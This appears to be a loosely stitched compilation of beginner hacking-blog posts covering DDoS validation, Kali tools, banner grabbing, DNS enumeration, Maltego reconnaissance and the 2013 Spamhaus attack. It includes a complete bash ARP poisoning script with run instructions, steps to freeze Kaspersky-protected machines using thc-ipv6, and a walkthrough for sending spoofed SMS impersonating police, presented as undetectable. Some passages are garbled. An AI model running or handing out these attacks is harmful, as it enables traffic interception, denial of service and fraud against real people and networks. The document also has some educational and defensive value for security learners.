How to validate DDoS defenses?
Validating DDoS defenses is essential for every organization. There are number of solutions that organizations can use to their DDoS defense and protection services they receive mitigation providers validate issued. Organizations must work closely with their DDoS mitigation providers to complete an organized provisioning and service validation. The only way to be sure that DDoS protection will be effectively assured by means of proactive validation against various kinds of attack scenarios.
Following best practices would help in defense:
The DDoS mitigation service is running, make sure that all applications to perform well.
Ensure that all routing and DNS works.
Tips to validate defense:
Work with your mitigation service provider, generating several gigabits of controlled traffic to the alarm, activation and mitigation features of the service.
Test small levels of traffic without scrubbing and validate that your on-premise monitoring systems function properly.
Without any DDoS protection This action will also help to identify. Stress points on your network
Perform baseline testing and calibration systems to remediate any network vulnerabilities.
Plan validation testing to validate that the service configuration is still working properly on a regular basis (monthly or quarterly) with your DDoS mitigation service provider – and eliminate the risk of network element failures due to DDoS.
If network problems during testing, may need to make changes based on recent changes in your network, as amended firewall rules, router firmware updates and reconfiguration. Changes your service.
Software Updates On Kali Linux (Beginner’s guide)
This tutorial is specially for new users of Kali Linux, in this we will show you how to update software in Kali Linux. Now the question is why do we need to update software? the answer is very clear that software updation introduce new enhancements in software, new features , patches and continues increase software’s’ wok efficiency.
Software updates helps you avoid being stuck with the obsolete versions, updates correct bugs encountered in current version and there are so many reasons for why to update software. So, here we have few simple steps to update software in Kali Linux.
Step 1: Open Software updates goto > System Tools > Software Update
Step 2: See the below image for more details about software about and click on continue anyway
Your software updates are now opened.
Step 3: Select your options to update and click on Install update as shown in the following image.
So, this is how easily software can be update on Kali Linux by just following 3 simple steps.
How to Run Armitage on Kali Linux?
You must be enjoying Kali Linux new feature and tools but without Armitage your hunting would be incomplete and you must be missing Armitage to run over new Kali Linux. In this tutorial you will be taught how to install & run Amritage on Kali Linux?
The purpose of this tutorial is to let you avoid the problems that most probably users had while installation. This tutorial also contains the solutions of those errors that you might face during installation. So here we go!
Step 1: Write the following command to install Armitage: apt-get install Armitage
Step 2: To run Armitage enter the command: Armitage
and fill the required information as shown in the below image.
Armitage installation is just done in two simple steps and now we will examine those errors that usually occur to most users during Armitage installation on Kali Linux.
Error 1: Armiatge could not found
Solution: You need to update your repositories using this command: apt-get update
Error 2: Database.yml file didn’t find
Solution: Start the Metasploit service by using this command: service Metasploit start
Have a great hunting with Armitage on Kali Linux, Good Luck!
Banner Grabbing Techniques
In this tutorial we will see some Banner grabbing techniques & tools and before this we will discuss what banner grabbing is? Why hackers use it? How it could be useful to improve network security? and methods to prevent this attack.
What Banner Grabbing is?
To understand banner gabbing, it is necessary to understand the term “Banner” first, banner in actual refers to a text embedded in a message sent by someone, this message usually contain information about applications involve in sending this message. A banner for an HTTP service mostly contains the type of operating system, web server, version number and other application running on a target host.
So, banner grabbing is basically a technique to extract information from the banner which helps hackers in identifying weaknesses and important information regarding targeted system. For OS and web server detection, we can grab a banner of HTTP. Since HTTP works on port 80, the following command would do the trick.
C:\>telnet target_IP 80
HEAD/HTTP/1.1
As you can see in the example, our request is vague and invalid. On a good day the result would be something like:
HTTP/1.1 200 OK
Date: Mon, 20 April 2013 13:00:10 EST
Server: Apache/2.6.01 (Unix) (Red Hat/Linux)
Last-Modified: Thu, 06 Sep 2010 17:55:40 PST
ETag: “2247-12b-449h4bd3″
Accept-Ranges: bytes
Content-Length: 1110
Connection: close
Content-Type: text/html
And there it is, The OS and the web server.
To grab a banner for SMTP (Send Mail Transfer Protocol): C: >telnet target_mailserver 25
Banners can also be grabbed from the famous 404 error page. Just messing with the URL could reveal some valuable information. Try, www.somewebsite.com/anyrandomtext. On an improperly configured system, the 404 page could be an attacker’s gold mine.
Except Telnet and Nmap, following tools can also be used for banner grabbing:
NetCat: Net-Cat or Ncat is the most preferable tool for banner grabbing, it is basically TCP/IP debugging tool but used for banner grabbing purpose too. It can be downloaded from NetCat official website: http://www.downloadnetcat.com/, it is free of cost and available in both windows and Linux versions.
Httprint: Httprint is a web server finger printing tool. It uses server signature to identify the version of a web application running on the server. It is very easy to use and available for both windows and Linux operating systems.
Miart HTTP Header: Miart HTTP Header tool identifies banner information from HTTP Header and response type. To use this tool you don’t need to have super skills, just enter the URL in the input box and press enter, your task will be complete in minutes.
Protection against banner grabbing:
- Preventing Apache Server & Its Derivative
- Preventing IIS Server
- IIS Lockdown
- Server Mask
- Page Xchanger
Also, we need to thoroughly analyze what information is leaked, change default settings, Turn off services that we don’t need such as telnet and windows features as well.
ARP Poisoning Attack
In the ARP poisoning attack, attacker sends an ARP reply to victim’s ARP request for a server. The attacker claims to be that server, tying his own MAC address to that of an IP address owned by another device. The bogus ARP message then also adds an entry to the switch’s ARP table. When a message arrives for the device as shown in the given diagram MAC B bogus ARP entry diverts to it MAC C.
We have a script here which will help us automate the process of ARP poison attacks. All we need is to insert the IP address of the target and the IP of the Gateway. We will just launch it and it will keep working. The code for the script is given below, just don’t forget to change the NICCard variable to whatever adapter you are using (e.g: wlan0).
#!/bin/bash
niccard=wlan0
if [[ $EUID -ne 0 ]]; then
echo -e “\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
echo -e "\t\t\t Example: sudo $0 \n"
exit 1
else
echo -e "\n\033[1;32m#######################################"
echo -e "# ARP Poison Script #"
echo -e "#######################################"
echo -n "Please enter target's IP: "
read victimIP
echo -n "Please enter Gateway's IP: "
read gatewayIP
echo -e "\n\t\t ---===[Time to Pwn]===—\n\n\n”
echo -e “\t\t–==[Targets]==–”
echo -e “\t\tTarget: $victimIP”
echo -e “\t\tGateway: $gatewayIP \n\n”
echo -e “[*] Enabling IP Forwarding \n”
echo “1″ > /proc/sys/net/ipv4/ip_forward
echo -e “[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n”
xterm -e “arpspoof -i $niccard -t $victimIP $gatewayIP” &
fi
How to use this script?
Using this script is very easy, if you have Ubuntu you can easily install it using apt-get to download the dsniff suite like so: sudo apt-get install dsniff
Or just follow these few simple steps:
1. Copy the above script into a word editor like nano or gedit.
2. Save it as arppoison.sh.
3. Run the following command against it: chmod +x arppoison.sh
4. Use the following command to run it: sudo ./arppoison.sh
5. Enter in the victim IP
6. Enter in the Gateway IP (i.e. the router)
7. Sit back as it enables IP forwarding and launches another shell running Arpspoof.
Protection gainst ARP poison Attack:
There is few switches use DHCP Snooping with ARP security to protect network from ARP poisoning attack and make sure all ARP replies from un-trusted ports are checked if they contain legitimate IP information – safeguarding your network.
DNS Enumeration with Backtrack
When it comes to web server’s penetration-testing, a DNS server is always on the top of the list because DNS server is the core gateway of an internal enterprise to the mighty internet. Information gathering, as we all know is an important part of Penetration, so gathering information about the DNS is just as important as the DNS server. Even if an attacker can enumerate a DNS server it can prove very lethal to the Organization whose information is stored on the server.
In this tutorial we will be looking at several tools and their usage by which we can enumerate a DNS server in several ways.
For this we will open CMD shell in BT and type cd /pentest/enumeration/dns
Then type ls
The list of DNS enumeration tools will appear and we will take a look at the use of all tools. 
First we will use dnsenum tool.
It is very easy to use this tool, just type the command in the format perl dnsenum.pl 
It will generate results as shown in below picture. 
It provided us with the list of entire IPs used by the website including the mail servers. 
Now the trick to extract information that we need for further phases of Pen-testing e.g if you want to test the mail server you can telnet it and exploit it by foot-printing (will be explained in upcoming tutorials). The next tool that we will use is dnswalk. 
It is also a very good tool for enumerating and provides with filtered information of the target.You can access it by cd dns command in dns folder. Only the difference in the input is In Dnswalk the target ends with a “.” 
We got the results here, as we have mentioned earlier dnswalk only provides basic information like SOA server and warnings. It is a partial enumeration testing tool. 
Next tool we will be digging is called dnsrecon, You can find this in the dns folder, It is a tool written python scripting.
Now as you can see below that we have performed multiple operations with dnsrecon which will be explained further. You can retrieve SRV records of the target also query SOA etc.
For retrieving SRV records you have to type the command ./dnsrecon.py –t srv –d target name.
Now here is how the result of the srv records look like:
And here’s how we query the SOA, NS and MX of the servers using the command ./dnsrecon.py –t std –d
And here how the result will look like:
By DNS enumeration you can gather a lot of information about the target and it can prove to be very helpful in a penetration test.
How little fight between two rivals caused ‘Largest DDOS attack in the history’?
You must be exhausted by the fact that your browser is performing like a turtle? Well it is not so surprising, because the internet as we all know is being targeted by the largest Distributed Denial of Service in its documented history ever.
How & Why did this happen?
It all started with a little incident between organizations, one known as Cyber-Bunker a web hosting company and another called Spamhaus a content filtration company. Spamhaus is a non-profit organization provides a list of IPs for spam filters to most of the huge money makers and ISPs all around the world. Recently Spamhaus blacklisted Cyber-bunker for exceptional hosting of child pornography and terrorism related material. This incident sparkled a fire and Spamhaus started getting DDOS attacks at random rates on 15th March 2013 but the intensity of these attacks rapidly increased and reached at 50 to100 GBPS, in the beginning the bandwidth consumption reached to a staggering proportions of 300 GBPS which is basically like pushing an elephant through a water hose. Suppose you have a router which supports 100 MBPS data transfer if you transfer 101 MBPS at any instant your router will become a flowerpot for gardening. Similar events are occurring now days.
First these attacks were just up for Spamhaus but now the whole internet is at stake where it is affecting the infrastructure of the internet. Google is providing its services to help mitigate these attacks. Five large investigation agencies are currently investigating the origin of these attacks. Spamhaus claims that Cyber-bunker is in co-operation with criminal elements and is behind this attack. However, it is not proven yet. Spamhaus has hired Cloudflare, an Internet security provision to strengthen its defense. Spamhaus with over 80 branches all around the globe is making itself one of the largest giant on internet. These attacks are Layer 3 DDOS attacks, making it difficult to tolerate.
Gradually these attacks are being mitigated and investigated by experts desperately trying to identify the source of these attacks. Now the one thing is proved after this attack that security industry is not ready for such kind of large attacks and if it can get up to 300 Gbps it might even go to 1Tbps……
References:
Reconnaissance with Maltego (A guide for beginners)
One of the most complex steps in Penetration-Testing is information gathering about the target. It is also necessary because as much as accurate information the Pen-tester would have the more efficient the pen-test would be. In this article we will be looking into a tool that is very popular among Pen-Testers when it comes to Information Gathering. This tool is called Maltego. We will be looking into several aspects that how Maltego works? Maltego comes with both Linux and windows versions, it is also built in Backtrack.
Once we get registered on Matelgo, we will be seeing a graph on our screen. We will look at the possibilities of Information gathering through this tool. On the left hand you will see a palette which contains transforms you can run. Here’s how it will look like.
Now here you can see a number of transforms that used for information gathering. First, we will gather information about a website. In the palette we will look under the Infrastructure and then a website. We will put the name of the website in the information and click “Run all Transforms”. And this is what we will get.
Now as you can see we have got quite a bit of information here about Mile2 including its Public IP, the websites it’s connected to, and e-mail addresses etc. Now this information can be very helpful if you are an out-bound Penetration-Tester. Next, we will look at how we can use Maltego as a search engine to find certain entities for us that normal search engines won’t provide publicly on the web. For this example we will select the Document Entity in palette. Let suppose we want to search a document named Pentest-mag.
Now as you can see in above image it has provided me some links of different articles given Pen test-mag. Having seen that it has also given us a direct link to those articles without wasting our time on searching them out. Now let’s assume that during a critical Pentest we want to gather information about a particular person, Maltego can help us with that as well. We will have to select the Person Entity in the Palette and it will provide us with all the information on the web related to that person instantly. 
As the result on the graph we have some useful information about the particular person including telephone number, associated social networks, accounts and some emails. Now the accuracy of this information is not often guaranteed but it can be a handy tool.
These are just a few drills that Maltego can perform, it depends on your objective that what information you want to extract about what entity. This tool can make quite a difference sometimes during an operation while its uses are dependent upon the Pen-tester.
Kaspersky Internet Security bug – Still susceptible
Kaspersky Internet Security 2013 (all Kaspersky products which include the firewall functionality) is still susceptible to a remote system freeze. As reported on the 3rd March 2013, the bug is still not fixed. This bug can be exploited by Potential attackers by sending specifically crafted IPv6 packets to the targeted systems.
If IPv6 connectivity to a victim is possible (which is always the case on local networks), a fragmented packet with multiple but one large extension header leads to a complete freeze of the operating system. No log message or warning window is generated, nor the system is able to perform any task.
To Test:
1. Download the thc-ipv6 IPv6 protocol attack suite for Linux from www.thc.org/thc-ipv6
2. Compile the tools with “make”
3. Run the following tool on the target: firewall6 19
Where the interface is network interface (e.g. eth0) target is the IPv6 address of the victim (e.g. ff02::1) port is any TCP port, doesn’t matter which (e.g. 80) and 19 is the test case number. The test case numbers 18, 19, 20 and 21 lead to a remote system freeze.
Solution:
Remove the Kaspersky Antivirus NDIS 6 Filter from all network interfaces or uninstall the Kaspersky software until a fix is provided. The bug was reported to Kaspersky first on the 21st January 2013, and then reminded on the 14th Feburary 2013. No feedback was given by Kaspersky, and the remainder contained a warning that without feedback the bug would be disclosed on this day.
SMS Spoofing with new KALI-Linux
The new Kali-Linux (BT6) comes with many advance and increasing features and one of its incredible feature is its SMS spoofing weapon. So today we will have fun with this feature and see how easily we can spoof SMS.
This is an amazing and improved feature that has made many security professionals think. Anyone can easily spoof sms from various numbers and there is no chance to be caught. This feature is located in the SET (Social Engineering toolkit). For this go to
Applications>>Kali Linux>>Exploitation tools>>se-toolkit
Now after selecting it you will be prompted a dialogue box then in this select Social Engineering toolkit.
Next select option 7: SMS spoofing attacks
Then select the option no 1: Perform SMS spoofing attack
After that again select option no 1: SMS Attack single phone number
Now enter the victim’s Phone-number with its country code
Now select a template or use predefined templates as shown in below image
I am selecting a fake police SMS option 19
Now it’s almost done, from here you can choose the predefined android emulator or use your the SMS accounts. Thus, either you can start a war or stop it by sending SMS from fake locations.
Do remember this tutorial is just for your learning purpose, do not use these tricks in unethical way. Have fun!
